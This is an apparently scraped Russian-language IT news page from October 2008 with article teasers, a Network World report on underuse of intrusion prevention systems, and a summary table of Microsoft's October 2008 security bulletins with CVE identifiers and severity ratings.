http://code.google.com/p/squirtle/
http://grutztopia.jingojango.net/

blondyn @ 2008-10-15T20:04:00

2008-10-15T16:04:25Z

Explanation and other locations

LAN online

2008-10-15T11:46:46Z

Буква «V» в KVM по IP

Передача видеосигнала по соединениям IP — задача непростая сама по себе, а уж если его необходимо синхронизировать с вводом с помощью мыши или клавиатуры (к примеру, при удаленном управлении медиасервером), то понадобятся непростые технические решения....

Защита от спама в электронной почте

Несмотря на заявления некоторых экспертов, что злоумышленников все меньше привлекает электронная почта и основная опасность теперь исходит от Web, количество рассылаемого по электронной почте спама и вирусов не уменьшается. Для защиты от перечисленных напастей разработаны различные программные и аппаратные средства, которые выпуcкают многие известные компании....

Сервисное обслуживание СКС

На первый взгляд, владельцу СКС, спроектированной и реализованной с соблюдением положений всех стандартов, норм и правил, в процессе эксплуатации не нужно делать ничего, что выходило бы за рамки технически предельно простых и организационно рутинных процедур ее администрирования. В силу целого ряда объективных причин реальное положение дел оказывается весьма далеким от описанной выше идеальной картины....

Почти на финишной прямой

Будущее отрасли связи за сетями следующего поколения (Next Generation Networks, NGN). Крупные операторы связи, ИТ-компании, оптовые провайдеры, а вслед за ними, похоже, и операторы сотовой связи переводят все свои сети на инфраструктуру на базе IP или планируют осуществить это в дальнейшем. Темпы реализации данной стратегии в каждой стране свои....

Системы предотвращения вторжений по-прежнему используются не полностью

2008-10-15T11:43:36Z

Элен Месмер, Network World, США

Сетевые системы предотвращения вторжений (Intrusion Prevention System, IPS) — это подключенные к сетевому каналу устройства, служащие для выявления и блокировки широкого спектра атак. Однако, как показывают последние исследования, подобное оборудование пока чаще используется в качестве систем обнаружения вторжений для пассивного мониторинга трафика.

Специалисты Infonetics Research опросили 169 специалистов по вопросам безопасности, отвечающих в своих организациях за управление системами предотвращения вторжений. В первую очередь исследователей интересовал вопрос о том, действительно ли функциональность фильтров IPS в полной мере используется для блокирования атак и, если это не так, то каковы причины. В рамках исследования, проведенного по инициативе производителя IPS компании TippingPoint, рассматривались продукты самой TippingPoint, а также решения, предлагаемые Cisco, IBM, McAfee и Sourcefire.

«Многие по-прежнему относятся к IPS с настороженностью, — заметил Джефф Вилсон, ведущий аналитик компании Infonetics по вопросам сетевой безопасности. — Основной вывод состоит в том, что IPS все еще используются не в полной мере, несмотря на то что пользователи стремятся, чтобы это выглядело иначе».

Cisco остается ведущим производителем на рынке IPS, что и подтвердил опрос: 77 респондентов используют IPS-решения компании Cisco, 38 — продукты TippingPoint, 36 отдали предпочтение IBM ISS Proventia, 26 выбрали McAfee IPS, а 15 применяют Sourcefire IPS. Все участники исследования детально описали, как они используют системы предотвращения вторжений в своих компаниях. Речь идет о компаниях свыше 9 тыс. сотрудников.

Первый шаг при выборе IPS, как правило, — это решение о том, использовать такие системы внутри сети или нет. Согласно полученным данным, так поступают 91% пользователей TippingPoint, 70% пользователей Cisco, 67% пользователей IBM и McAfee и около 55% пользователей Sourcefire.

Пользователи отказываются применять IPS непосредственно в сетевом канале в основном потому, что сомневаются в их надежности, а также опасаются снижения пропускной способности, увеличения задержки при передаче трафика и ошибочных идентификаций атак.

Компании, решившие интегрировать IPS в сеть, после этого определяют, какое количество фильтров, позволяющих блокировать различные виды атак, следует активировать на устройстве. Опрос показал, что в компаниях, подключающих IPS к сети, часто не используют все фильтры в режиме блокировки, а иногда просто устанавливается режим уведомления. Фильтры IPS для блокировки значительно чаще применяют на оборудовании TippingPoint и IBM и намного реже в системах Sourcefire. Решения IBM, Cisco и McAfee в половине случаев используются в режиме блокировки и в половине — в режиме уведомления.

Согласно данным опроса, обновления фильтров, предоставляемые производителями, выполняют в 40 — 74% случаев, в зависимости от продукта.

На вопрос, почему пользователи с неохотой устанавливают новые фильтры, независимый аналитик Ричард Стиеннон, посмотрев результаты данного исследования, заметил, что пользователи IPS, как правило, анализируют обновления фильтров в лабораторных условиях, прежде чем их установить. «Иногда сигнатуры фильтров могут нарушать работу приложений или блокировать протоколы, — пояснил Стиеннон. — Тогда их не устанавливают».

Несколько лет назад Стиеннон, будучи аналитиком Gartner, спровоцировал жаркую дискуссию, заявив о бесперспективности IDS. И сейчас, просмотрев результаты исследования, он сказал, что этот опрос Infonetics дал ему стимул снова выступить с критикой.

«IDS не имеют никакой перспективы, это неудачная технология, — подчеркнул Стиеннон, утверждая, что простая регистрация уведомлений об атаках почти всегда бессмысленна. — Для блокировки атак должно шире использоваться оборудование IPS».

Он также заметил, что оборудование TippingPoint, в отличие от системы Cisco, изначально было предназначено для работы в сетевом канале. Джефф Вилсон также согласен с тем, что IPS-решения Cisco не были рассчитаны на такую установку и, несмотря на то что Cisco остается лидером этого рынка, ее платформа в целом реже всего используется как настоящая система предотвращения вторжений для блокировки трафика атак.

Несмотря на то что аналитик Gartner Джон Пескаторе не знаком с результатами опроса Infonetics, он сказал, что собственная работа Gartner с клиентами показывает: может уйти значительное время, может быть, даже целый год, чтобы пользователи убедились в необходимости устанавливать системы IPS в канале в режим блокировки.

«Почему я не использую их на 100%, — удивляется он. — Да потому что это приводит к снижению производительности, они замедляют или даже могут полностью блокировать легитимный трафик».

Вопрос о производительности по-прежнему остается довольно острым, и его, как подчеркнул Пескаторе, необходимо в первую очередь решать специалистам отрасли IPS.

Краткий обзор исправлений от Microsoft за октябрь 2008

2008-10-15T07:50:00Z

Microsoft выпустила 11 бюллетеней безопасности, которые устранили 5 уязвимостей высокой степени опасности, 8 уязвимостей средней степени опасности и 7 уязвимостей низкой степени опасности.

#	Уязвимый компонент	Описание уязвимости	Наличие эксплоита	Рейтинг опасности (Microsoft)	Рейтинг опасности (SecurityLab)
MS08-056	Microsoft Office CVE-2008-4020	Межсайтовый скриптинг в Microsoft Office (AV:N/AC:L/Au:N/C:N/I:P/A:N/E:U/RL:O/RC:C) = 3.7	Нет	Средний	Низкий
MS08-057	Microsoft Excel CVE-2008-4019 CVE-2008-3471 CVE-2008-3477	Ошибка проверки подлинности объектов календаря в Microsoft Excel (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:U/RL:O/RC:C) = 7.4 Уязвимость при обработке форматов файлов в Microsoft Excel (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:U/RL:O/RC:C) = 7.4 Уязвимость при обработке формул в Microsoft Excel (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:U/RL:O/RC:C) = 7.4	Нет	Критический	Высокий
MS08-058	Microsoft Internet explorer CVE-2008-2947 CVE-2008-3472 CVE-2008-3473 CVE-2008-3474 CVE-2008-3475 CVE-2008-3476	Обход ограничений безопасности в Microsoft Internet Explorer (AV:N/AC:L/Au:N/C:P/I:P/A:N/E:P/RL:O/RC:C) = 5 Множественные уязвимости в Microsoft Internet Explorer (AV:N/AC:L/Au:N/C:P/I:P/A:N/E:U/RL:O/RC:C) = 4.7 (AV:N/AC:L/Au:N/C:P/I:P/A:N/E:U/RL:O/RC:C) = 4.7 (AV:N/AC:L/Au:N/C:P/I:N/A:N/E:U/RL:O/RC:C) = 3.7 (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:U/RL:O/RC:C) = 7.4 (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:U/RL:O/RC:C) = 7.4	CVE-2008-2947 публично известная уязвимость	Критический	Средний Высокий
MS08-059	Host Integration Server (HIS) CVE-2008-3466	Выполнение произвольных команд в Microsoft Host Integration Server (AV:A/AC:L/Au:N/C:C/I:C/A:C/E:U/RL:O/RC:C) = 6.1	Нет	Критический	Средний
MS08-060	Active Directory CVE-2008-4023	Переполнение буфера в Active Directory в Microsoft Windows (AV:A/AC:L/Au:N/C:C/I:C/A:C/E:U/RL:O/RC:C) = 6.1	Нет	Критический	Средний
MS08-061	Microsoft Windows CVE-2008-2250 CVE-2008-2251 CVE-2008-2252	Повышение привилегий в Microsoft Windows (AV:L/AC:L/Au:S/C:C/I:C/A:C/E:U/RL:O/RC:C) = 5 (AV:L/AC:L/Au:S/C:C/I:C/A:C/E:U/RL:O/RC:C) = 5 (AV:L/AC:L/Au:S/C:C/I:C/A:C/E:U/RL:O/RC:C) = 5	Нет	Важный	Низкий
MS08-062	Windows Internet Printing Service (IIS) CVE-2008-1446	Переполнение буфера в Internet Printing Service в Microsoft Windows (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:H/RL:O/RC:C) = 7.8	Активно эксплуатировалась в целевых атаках	Важный	Средний
MS08-063	Windows SMB CVE-2008-4038	Уязвимость в SMB протоколе в Microsoft Windows (AV:A/AC:L/Au:N/C:C/I:C/A:C/E:U/RL:O/RC:C) = 6.1	Нет	Важный	Средний
MS08-064	Microsoft Windows CVE-2008-4036	Повышение привилегий в Virtual Address Descriptor в Microsoft Windows (AV:L/AC:L/Au:S/C:C/I:C/A:C/E:U/RL:O/RC:C) = 5	Нет	Важный	Низкий
MS08-065	Message Queuing Service CVE-2008-3479	Уязвимость в Message Queuing Service в Microsoft Windows (AV:A/AC:L/Au:N/C:C/I:C/A:C/E:U/RL:O/RC:C) = 6.1	Нет	Важный	Средний
MS08-066	Windows AFD CVE-2008-3464	Уязвимость в AFD драйвере в Microsoft Windows (AV:L/AC:L/Au:S/C:C/I:C/A:C/E:U/RL:O/RC:C) = 5	Нет	Важный	Низкий
-	ActiveX компоненты	Также выпущено исправление, которое деактивирует ActiveX компоненты от Microgaming, System Requirements Lab, PhotostockPro и Microsoft ActiveX компоненты, описанные в MS02-044, MS08-017, MS08-041 и MS08-052.

рекомендуется всем пользователям установить обновления с сайта производителя.